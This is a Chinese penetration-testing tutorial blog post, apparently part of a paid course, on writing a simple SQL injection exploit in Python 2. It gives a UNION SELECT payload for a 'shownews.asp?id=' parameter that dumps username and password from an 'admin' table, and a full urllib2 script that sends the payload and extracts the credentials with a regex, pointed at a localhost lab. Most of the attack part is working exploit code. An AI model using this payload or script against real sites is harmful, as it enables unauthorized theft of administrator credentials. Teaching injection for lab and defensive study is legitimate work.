[原创]WEB安全第七章exp编写篇02 简单注入exp编写 python
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第七章exp编写篇02 简单注入exp编写 python
python版本
python2.7 停止更新
python3 学的话就要学习python3
python编写exp
注入的exp payload
shownews.asp?id=-110+union+select+1%2c2%2cchr(126)%2busername%2bchr(124)%2bpassword%2bchr(126)%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin
coding:utf-8 设置编码
import 导入模块 导入urllib2 re
首先 设置 pydev工具 新建一个python项目 新建exp01.py文件
![[原创]WEB安全第七章exp编写篇02 简单注入exp编写 python](https://www.moonsec.com/wp-content/uploads/2019/11/image001-40.png)
![[原创]WEB安全第七章exp编写篇02 简单注入exp编写 python](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
代码
[code lang=”python”]
#coding:utf-8
import urllib2
import re
def get_page(url):
#获取网页源码
payload=’/shownews.asp?id=-110+union+select+1%2c2%2cchr(126)%2busername%2bchr(124)%2bpassword%2bchr(126)%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin’
req = urllib2.Request(url+payload)
response = urllib2.urlopen(req)
page = response.read()
return page
def exploit(url):
#利用函数
html = get_page(url)
try:
m =re.search(‘~(.*?)~’,html)
return m.group(1)
except:
return ”
url = ‘http://127.0.0.1:99’
print exploit(url)
[/code]
![[原创]WEB安全第七章exp编写篇02 简单注入exp编写 python](https://www.moonsec.com/wp-content/uploads/2019/11/image002-39-1024x469.png)
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/519.html
mOon 